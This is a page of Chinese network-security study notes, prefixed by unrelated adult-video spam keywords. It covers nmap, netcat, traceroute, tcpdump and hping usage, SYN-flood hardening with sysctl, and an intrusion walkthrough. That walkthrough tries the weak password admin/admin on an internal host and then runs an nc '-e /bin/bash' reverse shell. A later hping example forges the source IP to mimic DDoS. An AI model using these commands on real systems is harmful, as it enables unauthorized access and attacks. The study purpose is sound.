最近中文字幕高清中文字幕无,亚洲欧美高清一区二区三区,一本色道无码道dvd在线观看 ,一个人看的www免费高清中文字幕

fping參數(shù)

主機掃描命令

網(wǎng)絡(luò)安全技術(shù)定義

1.網(wǎng)絡(luò)入侵方式
踩點,網(wǎng)絡(luò)掃描,查點,提權(quán)等

1. tracert命令tracert www.jd.com 查ip地址
   

2. nmap命批量主機服務(wù)掃描令,得知某個路由里面的端口

3. 嘗試進行暴力破解,發(fā)現(xiàn)登陸內(nèi)網(wǎng)http://10.202.4.73,是否能用弱口令進行登陸,例如:admin/admin

4. 登陸到管理界面后,嘗試用nc命令進行交互式shell操作,例如nc -10.68.104.6? 2005 -e/bin/bash監(jiān)聽黑客的2005接口,并將目標機器的所有bash命令
   

5. 
   

SYN類型DDOS攻擊：服務(wù)器接收到連接請求（syn=j），將此信息加入backlog未連接隊列，導(dǎo)致隊列滿了丟棄掉正常的SYN請求，同時發(fā)送請求包給客戶（syn=k,ack=j+1），進入SYN_RECV狀態(tài)。當未收到客戶端的確認包時，一直重發(fā)請求包，占用網(wǎng)絡(luò)帶寬，引起網(wǎng)絡(luò)堵塞甚至系統(tǒng)癱瘓。

減少syn和ack包的重試次數(shù)

????sysctl -w net.ipv4.tcp_synack_retries=3

????sysctl -w net.ipv4.tcp_syn_retries=3

SYN cookies技術(shù)

????sysctl -w net.ipv4.tcp_syncookies=1

增加backlog隊列

?????sysctl -w net.ipv4.tcp_max_syn_backlog=2048

關(guān)閉ICMP協(xié)議請求

?????sysctl -w net.ipv4.icmp_echo_ignore_all=1

netcat（nc）工具：在centos中通過yum search nc查找，然后安裝。 nc -z -v -n -w2 172.31.100.7 21-25 可以運行在TCP或者UDP模式，默認是TCP，-u參數(shù)調(diào)整為UDP。 z 參數(shù)在連接成功后立即關(guān)閉連接，不進行數(shù)據(jù)交換；v 參數(shù)指詳細輸出；n 參數(shù)表示不要使用DNS反向查詢IP地址的域名。 這個命令會打印21到25所有開放的端口并且打印運行在這個端口上服務(wù)的banner信息。Banner是一個文本，是一個你連接的服務(wù)發(fā)送給你的文本信息。但是，并不是所有的服務(wù)都會發(fā)送banner。

1、nmap -sP IP/24 查看這一段IP內(nèi)哪個主機的開放的 ICMP協(xié)議類型 ping掃描 2、nmap -sS [-p 端口范圍] IP 查看IP開發(fā)的TCP端口 TCP SYN掃描 tcp半開放掃描(沒有建立三次握手)(不會被服務(wù)檢測，例如Apache等) 默認掃描0-1024端口及一些常用端口 3、nmap -sT [-p 端口范圍] IP TCP connect()掃描 TCP全開放掃描 4、nmap -sU IP UDP掃描 UDP協(xié)議掃描 有效透過防火墻策略

nmap -sP（ping掃描主機是否存活） x.x.x.0/24? ? <nmap -sP?61.135.169.0/24>

nmap -sS（TCP半開放掃描） -p（指定端口掃描范圍） [端口1]-[端口2] [目標IP]????<nmap -sS -p 0-30000 192.168.5.7>

nmap -sT（TCP全開放掃描）?-p（指定端口掃描范圍） [端口1]-[端口2] [目標IP]????<nmap -sT -p 0-30000 192.168.5.7>

nmap -sU（UDP掃描）?-p（指定端口掃描范圍） [端口1]-[端口2] [目標IP]????<nmap -sU -p 0-30000 192.168.5.7>

tcp半開放掃描：發(fā)送SYN包但不建立第三次握手，不被目標服務(wù)發(fā)現(xiàn) tcp全開放掃描：進行三次握手，建立tcp連接

原理與traceroute一致，mtr另外可以看丟包率

路由掃描：查詢本機到另一個主機經(jīng)過的路由跳數(shù)及數(shù)據(jù)延遲情況。 tracerpute原理：traceroute 送出一個TTL（生存時間）是1的UDP數(shù)據(jù)包（每次送的的是3個40字節(jié)的包，包括源地址，目的地址和包發(fā)出的時間標簽）到目的地，當路徑上的第一個路由器收到這個數(shù)據(jù)包時，它將TTL減1變?yōu)?，并送回一個ICMP數(shù)據(jù)包，表示UDP數(shù)據(jù)包已經(jīng)執(zhí)行；接著再送出另一個TTL為2的數(shù)據(jù)包，發(fā)現(xiàn)第二個路由器，然后一直重復(fù)執(zhí)行該操作，直到某個數(shù)據(jù)包抵達目的地；因為它所選擇送達的port number（30000以上）是一般應(yīng)用程序都不會用的端口，所以在traceroute送出UDP數(shù)據(jù)包到目的地時，該目的主機會送回一個目的地址不可達的消息

hping 一 對制定端口發(fā)起TCP探測 ?二 偽造來源IP，模擬Ddos攻擊

Linux查看端口????netstat -l（監(jiān)聽）t（TCP）n（不顯示主機名）? ? <netstat -ltn>

Windows查看端口????netstat -ano

hping -p [端口] -S（發(fā)送SYN包） [目標IP]?

-a（偽造發(fā)送IP） [偽造IP] ? ?<hping -p 22 -S 192.168.3.26 -a 192.168.3.27>

修改Linux內(nèi)核禁用ICMP報文????sysctl -w net.ipv4.icmp_echo_ignore_all=1

查看經(jīng)過某網(wǎng)絡(luò)設(shè)備包信息 ? ?tcpdump -n（不把主機IP轉(zhuǎn)換為名稱） -p（不讓網(wǎng)絡(luò)界面進入混雜模式） -i[網(wǎng)卡名稱] src host（只顯示此IP包信息） [目標IP] ? <tcpdump -np -ieth1 src host 192.168.3.56>?

hping安裝依賴了libpcap和libpcap-devel。 make出現(xiàn)錯誤：net/bpf.h：沒有那個文件或目錄，未發(fā)現(xiàn)bpf-h，解決辦法：ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h；/usr/bin/ld:cannot find -ltcl，解決辦法：yum install tcl-devel；創(chuàng)建符號鏈接 "/usr/sbin/hping"文件已存在，解決辦法：使用 rm -rf ?/usr/sbin/hping* 刪除。 make install之后，出現(xiàn)Can't install the man page: /usr/local/man/man8 does not exis